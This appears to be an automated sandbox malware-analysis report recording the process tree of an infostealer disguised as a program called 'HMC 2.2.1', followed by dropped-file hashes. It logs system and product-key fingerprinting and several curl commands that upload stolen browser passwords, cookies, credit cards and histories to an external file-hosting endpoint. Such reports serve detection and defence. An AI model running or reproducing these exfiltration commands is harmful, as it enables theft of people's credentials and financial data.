C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:5188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:3108
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:1728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:3552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468 -
C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe"x64\runtime.exe"3⤵
- Executes dropped EXE
PID:1900 -
C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe"x64\runtime.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:3124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:5116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5856
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5588
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic bios get smbiosbiosversion"5⤵PID:3472
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic MemoryChip get /format:list | find /i "Speed""5⤵PID:2236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1008
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list6⤵PID:5656
-
C:\Windows\system32\find.exefind /i "Speed"6⤵PID:5524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:6040
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:5484 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:4668
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:4624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4276
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /fo csv"5⤵PID:4748
-
C:\Windows\system32\tasklist.exetasklist /fo csv6⤵
- Enumerates processes with tasklist
PID:5532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic MemoryChip get /format:list | find /i "Speed""5⤵PID:5732
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list6⤵PID:5648
-
C:\Windows\system32\find.exefind /i "Speed"6⤵PID:2656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:1756
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:2824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:4336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:3148
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5516
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:780
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:4168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:1196
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:1904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:4984
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:4808
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"5⤵PID:3668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:5976
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:5944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:5596
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic ComputerSystem get TotalPhysicalMemory"5⤵PID:6056
-
C:\Windows\System32\Wbem\WMIC.exewmic ComputerSystem get TotalPhysicalMemory6⤵PID:5424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl http://api.ipify.org/ --ssl-no-revoke"5⤵PID:2352
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke6⤵PID:5292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:5372
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5676
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:1396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"5⤵PID:2696
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile6⤵PID:2228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"5⤵PID:4524
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile6⤵PID:3108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"5⤵PID:1264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4724
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile6⤵PID:5292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"5⤵PID:5480
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile6⤵PID:5212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"5⤵PID:5660
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile6⤵PID:5776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"5⤵PID:3280
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile6⤵PID:5272
-
C:\Users\Admin\Downloads\HMC 2.2.1\errorlog.exe"errorlog.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/z5vMmkQ8pj4⤵PID:4056
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa797e46f8,0x7ffa797e4708,0x7ffa797e47185⤵PID:2704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa817946f8,0x7ffa81794708,0x7ffa817947182⤵PID:1580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:3736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:82⤵PID:4012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:12⤵PID:5356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:12⤵PID:5732
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:5124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:2424
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵PID:1408
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5260 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:5748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:5424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵PID:1272
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:12⤵PID:5688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:12⤵PID:2976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:12⤵PID:1648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:1564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:2300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:5100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9017918014205461565,15523003998590968170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:4804
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3196
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3828
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5d8f10b0d24ee870b89789992dada25bf
SHA1c643fcd06d27546467d47b88b4d56c2d1fc80aad
SHA2566bf825859a8bef66e28f70f4e82594f896306473e064e11e34b00514252746d3
SHA5123e1037371d66d5019a5b3f418a0c35915e49e08ec15c45c76fb43f5539424d904013099cd1fee0a4e7c1f34835adb9a0416d2c1fe7b479def2d328ff4abd0107
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c9c4c494f8fba32d95ba2125f00586a3
SHA18a600205528aef7953144f1cf6f7a5115e3611de
SHA256a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b
SHA5129d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54dc6fc5e708279a3310fe55d9c44743d
SHA1a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2
SHA256a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8
SHA5125874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\83eb07bf-f2ad-4e6e-8b5b-1c667f6ad13b.tmpFilesize
6KB
MD54804bad6962fed722d22b025bb0e871f
SHA1254033bb74d45d166f8dcdf3fc727a9bb9a3ff0e
SHA2566ec083e07d1e320b1608923184e687b39608e89f2c6d7cf4c78ecbdc53b7aca8
SHA512dae874d69cf53f5f55b965150d521045f665206d171934f7b408662b56a26a9cb4a8b912290153cd0232f04197c172b3874fcb14a62720fb411dee302aa6e354
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000063Filesize
197KB
MD5e9fb41bb852b233dd6e8c2b89c1b3aff
SHA169bff41fdaad3960f2fd4a1e7df4392898237410
SHA256d9ca53754d62316b483e58954741b8937836a2b4be4c0b6dbd5a83b6a7114719
SHA5121242b0fb8856e9230f0c78530f9564618bbbc95b1a51c4b8155caf7e9a064340f90142dd2bc44c6439fd5b0f281f12974275e54b76bde81f570d06a3d8b88479
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
72B
MD535b8116bfc6b2e8b143bb17f10221f80
SHA1da1ccef45629052b3f5d9fc751cbd88b442451d3
SHA256582f33b6aa501afdb5af5acf94e7c54ed5a9b81c0bb5590e09c99dd185b8448d
SHA51237322055326d9bb57c7a5a0fb7a5e5a359abc06368ca97cfcce20714c4d3c437f590668d7fe569ec20cdaa06188e7c7588cd8e732ba4889c0a1146624455f812
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
336B
MD5197037c5a9aa0631de44b92aa634f766
SHA1d23aea66a32dc62d000d380ae8ce09c5176f91d4
SHA256a6f46768161439029ff1aac07326c6fdc91297d3d7d173925ed6a4614125bc8e
SHA5124a4d0efed70a45109d759c57cf21b64a6c8ea72c4fc0d7e22600083d459a43e955781c49b7f543d4317e44098b3d54fd4ae7b62486d4d217fdec308d64ebfd80
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
3KB
MD5d9a5b789a68c2cfa15ba1a27ba23ab15
SHA132f9b5a42bde2801f1c3bbaaaf30782db09abe52
SHA256127473b70993ddaa0723ed8363b6182fada16bb08c37ffeae1629fa799e91ad3
SHA512fbaf4fa4ca610c5cdf3e4966ef0302e3bab824856a2f162923ac24e9dc29f4230c3cbc044f4d986570058202643bf5a3622f970bd13f2d64082f40ecdf10730a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5a640b.TMPFilesize
1KB
MD5619f66015f3e95045c9061d482ecdd14
SHA1681d9726ea86a81541fec5622f6c560d94a3b104
SHA2560dd40435e0adb16462505c44e2c44fca935b83019ad6f292830e16b74797cb8f
SHA5128d300ad664b3f061217866403cdeac105dcf120a962083cca30182565f9982efd39b391222d480d06436e3cd0db3fb0430dc3b265a946eabb797aa9626c952d8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_web.telegram.org_0.indexeddb.leveldb\MANIFEST-000001Filesize
23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1004B
MD5672f6d9a6a73507560b90aef49aeea0b
SHA125222dcc8710b41f472f7d74528817319174ed8a
SHA256ced0cd1cd942594d71e27dd64e8b07166446903866d6614d1050cd14f1af80fe
SHA5122dd94e1621e4c1769c9a6c17501f03115f3b24bb0180b3fa6ba47e2bb9bbaf607d98caa7cc20fe8f291b5ede037c08a356530260c6b265b3cb1a223a6d4c2990
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD51e01474b42393f563c5ae3922ed84221
SHA11a94b52c85dc9fcb27bc0e71903c7c8c7bccf51f
SHA256bf4f6ca6aa47bac87d73c6fadf36eee399fbb2b7409f0d43f9ca59a73a52979f
SHA5126b5c64914859dfa1adf94cb5f6f77574bc9615242a0b09bb8f67d645086f9630a4488c731d9920e1a625fcb791f24c8e50e5130e9f40703d28a31a0f51e215cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD52672dd0299f74ead2e60eda26f197929
SHA12ab108ced1d0c08b029e82a7842acd1e90cc07ec
SHA25689a49c73eaa20ef8820ed553a49078b1ddac655a3806b12f5d1dbcf81b66a0d0
SHA512eea0772febb83827cbd77c60e892b29a6e8dfc54c8c1934c4ed4fceb503deb0e9f898a2c75299833099d9e62863a2eea12b5e24fd7aebce1a2855540275c2ddd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5898f146a1dd7d566125d18a89034bfac
SHA185ee338df5ba951795c8ddeda20f84fa0f97d267
